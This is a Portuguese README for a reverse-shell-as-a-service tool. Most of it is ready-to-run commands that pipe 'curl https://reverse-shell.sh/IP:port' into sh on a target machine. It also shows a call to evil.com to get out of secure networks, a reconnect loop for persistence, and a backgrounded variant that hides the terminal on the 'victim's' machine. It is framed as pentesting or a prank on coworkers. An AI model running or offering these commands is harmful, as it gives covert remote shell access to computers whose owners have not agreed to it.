
Serviço de reverse shell sob demanda que detecta automaticamente o ambiente alvo e executa o payload apropriado para acesso remoto durante testes de penetração.
Reverse Shell como Serviço - https://reverse-shell.sh
Reverse shell fácil de lembrar que deve funcionar na maioria dos sistemas Unix-like.
Detecta software disponível no alvo e executa um payload apropriado.
Na sua máquina, abra uma porta e escute nela. Você pode fazer isso facilmente com o netcat.
nc -l 1337
Na máquina alvo, canalize a saída de https://reverse-shell.sh/yourip:port para sh.
curl https://reverse-shell.sh/192.168.0.69:1337 | sh
Volte para sua máquina, agora você deve ter um shell prompt.
Isso é destinado a ser usado para pentest ou para ajudar colegas de trabalho a entender por que devem sempre travar seus computadores. Por favor, não use isso para nada malicioso.
Você pode usar um hostname em vez de um IP.
curl https://reverse-shell.sh/localhost:1337 | sh
Por ser uma conexão reversa, ela pode furar firewalls e se conectar à internet.
Você poderia escutar por conexões em um servidor em evil.com e obter um reverse shell de dentro de uma rede segura com:
curl https://reverse-shell.sh/evil.com:1337 | sh
Por padrão, quando o shell termina, você perde a conexão. Você pode fazer isso acidentalmente com um comando inválido. Você pode facilmente criar um shell que tentará reconectar envolvendo-o em um loop while.
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
Cuidado se você fizer isso com um colega de trabalho: se eles saírem do escritório com isso ainda rodando, você os está deixando vulneráveis a ataques.
A sessão do terminal precisa ser mantida aberta para persistir a conexão reverse shell. Isso pode ser um pouco revelador se você está tentando pregar uma peça em colegas de trabalho.
O seguinte comando executará o reverse shell em um processo em segundo plano e sairá do terminal, não deixando janelas de terminal suspeitas abertas na máquina da vítima.
Certifique-se de executar isso em uma nova janela de terminal, caso contrário você perderá qualquer trabalho na sua sessão atual.
sh -c "curl https://reverse-shell.sh/localhost:1337 | sh -i &" && exit
MIT © Luke Childs